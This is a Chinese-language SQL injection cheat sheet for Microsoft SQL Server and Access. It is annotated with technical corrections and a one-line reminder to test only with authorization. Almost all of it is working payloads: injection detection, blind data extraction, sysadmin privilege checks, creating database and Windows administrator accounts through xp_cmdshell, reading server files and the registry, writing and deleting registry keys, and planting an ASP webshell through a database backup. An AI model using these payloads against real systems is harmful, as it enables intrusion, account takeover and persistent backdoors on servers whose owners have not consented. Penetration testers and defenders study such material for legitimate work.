1.判断是否有注入 ;and 1=1 ;and 1=2
（两次返回页面不同，说明参数被拼进 SQL 语句执行。以下所有 payload 仅限在取得书面授权的测试范围内使用。）

2.初步判断是否是mssql ;and user>0
（利用 nvarchar 与 int 比较时的类型转换错误把当前用户名带进报错信息，仅在页面回显数据库错误时有效。）

3.注入参数是字符型 'and [查询条件] and ''='

4.搜索时没过滤参数的 'and [查询条件] and '%25'='
5.判断数据库系统

;and (select count(*) from sysobjects)>0    mssql

;and (select count(*) from msysobjects)>0   access
（两条语句通常以报错信息不同来区分：mssql 上第一条成立、第二条报对象不存在；Access 上 msysobjects 默认无读权限，会报无权限错误。）
6.猜表名（原文写作"数据库名"，from 后面实际填的是表名） ;and (select Count(*) from [表名])>0

7.猜字段 ;and (select Count(字段名) from 表名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 表名)>0
9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
（把 >0 换成 >N / =N 对每一位做二分比较；mid/asc 是 Access(Jet) 函数，substring/unicode 是 mssql 函数，不能混用。）
10.测试权限结构(mssql)
（IS_SRVROLEMEMBER 返回 1 表示当前登录属于该服务器角色，0 表示不属于，NULL 表示角色名无效；IS_MEMBER 针对的是当前数据库的角色。）

;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(select IS_MEMBER('db_owner'));--
11.添加mssql和系统的帐户（以下均需要 sysadmin 权限）

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,password,username;--
（sp_password 的参数顺序是 旧密码,新密码,登录名，原文把登录名和密码写反了；也可直接 sp_addlogin 'username','password' 一步完成。）

;exec master.dbo.sp_addsrvrolemember 'username','sysadmin';--
（sp_addsrvrolemember 的参数顺序是 登录名,角色名，两者之间要有逗号。）

;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--

;exec master.dbo.xp_cmdshell 'net user username password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
（SQL Server 2005 起 xp_cmdshell 默认关闭，需先 ;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;-- 。net user / net localgroup 能否成功取决于 SQL Server 服务账户在操作系统上的权限，服务账户不是本地管理员时会失败。）
12.(1)遍历目录

;create table dirs(paths varchar(100), id int);--

;insert dirs exec master.dbo.xp_dirtree 'c:\';--

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0
（原文末尾的 ">)" 是笔误，应为 ">0"：varchar 与 int 比较触发类型转换错误，把路径带进报错信息，同样依赖页面回显报错。xp_dirtree 返回 subdirectory、depth 两列，与 dirs 表的两列对应。测试结束后记得 drop table dirs。）
(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容
（之后按第 12(1) 节的方式逐行读出 temp 表的内容。temp 是普通表而不是临时表，结束后应 drop table temp。）
13.mssql中的存储过程（xp_reg* 系列默认只有 sysadmin 可执行）

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回指定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

常用的值类型有 2 种：REG_SZ 表示字符型，REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表

xp_regdeletevalue 根键,子键,值名

;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值

xp_regdeletekey 根键,子键

;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
14.mssql的backup创建webshell（需要 sysadmin 或 db_backupoperator 权限，且 SQL Server 服务账户对目标目录有写权限）

use model

create table cmd(str image);

insert into cmd(str) values ('');   -- 引号内填入 webshell 代码（此处为占位），它会随数据页一起写入备份文件

backup database model to disk='c:\l.asp';
（备份文件前后带有二进制数据，依赖 ASP 解析器忽略 <% %> 之外的内容。model 是新建数据库的模板库，测试完成后务必 drop table cmd 并删除备份文件，否则之后新建的每个数据库都会带上这张表。）
15.mssql内置函数

;and (select @@version)>0    获得 SQL Server 版本号（返回的字符串里同时带有操作系统版本信息）

;and user_name()='dbo'       判断当前连接用户是否映射为当前库的 dbo（不等同于 sa；判断是否为 sa/sysadmin 应使用 IS_SRVROLEMEMBER('sysadmin') 或 system_user='sa'）

;and (select user_name())>0  爆当前数据库用户名（登录名用 system_user）

;and (select db_name())>0    得到当前连接的数据库名
16.简洁的webshell（与第 14 条相同，只是备份路径不同；同样要求服务账户对 g:\wwwtest\ 有写权限，完成后 drop table cmd）

use model

create table cmd(str image);

insert into cmd(str) values ('');   -- 引号内填入 webshell 代码

backup database model to disk='g:\wwwtest\l.asp';